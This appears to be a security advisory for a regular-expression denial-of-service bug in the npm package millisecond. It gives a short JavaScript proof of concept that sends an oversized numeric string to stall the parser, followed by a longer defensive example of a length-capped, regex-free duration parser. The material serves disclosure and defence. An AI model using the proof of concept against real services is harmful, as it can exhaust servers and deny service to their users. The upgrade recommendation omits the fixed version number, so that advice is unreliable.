GMS-2021-37: Regular Expression Denial of Service in millisecond
Versions of millisecond are affected by a regular expression denial of service vulnerability when extremely long version strings are parsed.

## Proof of concept
```js
var ms = require('millisecond');

// Build a string of `len` repetitions of `chr` (the loop runs len + 1 times, as in the original PoC).
var genstr = function (len, chr) {
  var result = "";
  for (var i = 0; i <= len; i++) {
    result = result + chr;
  }
  return result;
};

// Length is taken from the command line; the long numeric prefix is what triggers the backtracking.
ms(genstr(parseInt(process.argv[2], 10), "5") + " minutea");
```

## Recommendation
Update to or later.
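The usual defence against this class of bug is to bound the input before any pattern matching happens and to parse with a single linear pass instead of a backtracking regular expression. The parser below is an added example written for this advisory, not millisecond's own code; the unit table, the 100-character cap and the rejection of unknown units are assumptions made for illustration. Fed the PoC input from above, it returns `undefined` immediately because the length check runs before any character is examined.

```javascript
// Added example (not millisecond's code): a length-capped, regex-free duration parser.
const MAX_INPUT_LENGTH = 100; // assumption: no legitimate duration string is longer than this

// Assumed unit table, in milliseconds.
const UNIT_MS = {
  ms: 1, millisecond: 1, milliseconds: 1,
  s: 1000, sec: 1000, second: 1000, seconds: 1000,
  m: 60000, min: 60000, minute: 60000, minutes: 60000,
  h: 3600000, hr: 3600000, hour: 3600000, hours: 3600000,
  d: 86400000, day: 86400000, days: 86400000,
};

function isDigit(c) { return c >= '0' && c <= '9'; }
function isLetter(c) { return (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z'); }

// Parses strings such as "5 minutes", "1.5h" or "250" (bare number = milliseconds).
// Returns a number of milliseconds, or undefined when the input is rejected.
// Every loop advances `i` by one on each iteration, so the work is linear in the length.
function parseDuration(input) {
  if (typeof input !== 'string') return undefined;
  // Reject oversized input up front: no parsing work is spent on it at all.
  if (input.length > MAX_INPUT_LENGTH) return undefined;

  const n = input.length;
  let i = 0;
  while (i < n && input[i] === ' ') i++;            // leading whitespace

  const numStart = i;
  if (i < n && (input[i] === '-' || input[i] === '+')) i++;
  let seenDigit = false;
  let seenDot = false;
  while (i < n) {
    const c = input[i];
    if (isDigit(c)) { seenDigit = true; i++; }
    else if (c === '.' && !seenDot) { seenDot = true; i++; }
    else break;
  }
  if (!seenDigit) return undefined;
  const value = parseFloat(input.slice(numStart, i));

  while (i < n && input[i] === ' ') i++;            // whitespace between number and unit

  const unitStart = i;
  while (i < n && isLetter(input[i])) i++;
  const unit = input.slice(unitStart, i).toLowerCase() || 'ms';

  while (i < n && input[i] === ' ') i++;            // trailing whitespace
  if (i !== n) return undefined;                     // anything else is trailing garbage

  const factor = UNIT_MS[unit];
  if (factor === undefined) return undefined;        // unknown unit: reject rather than guess
  return value * factor;
}

// Usage: the PoC-style input is rejected by the length cap before the scan starts.
const oversized = '5'.repeat(10000) + ' minutea';
console.log(parseDuration('5 minutes'), parseDuration('1.5h'), parseDuration(oversized));
```

The design choice worth noting is the order of the checks: the cap is applied to the raw string, so the cost of a rejected input is a single length comparison regardless of what it contains. If a library cannot be replaced, the same cap can be applied in a thin wrapper in front of the library call.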
## References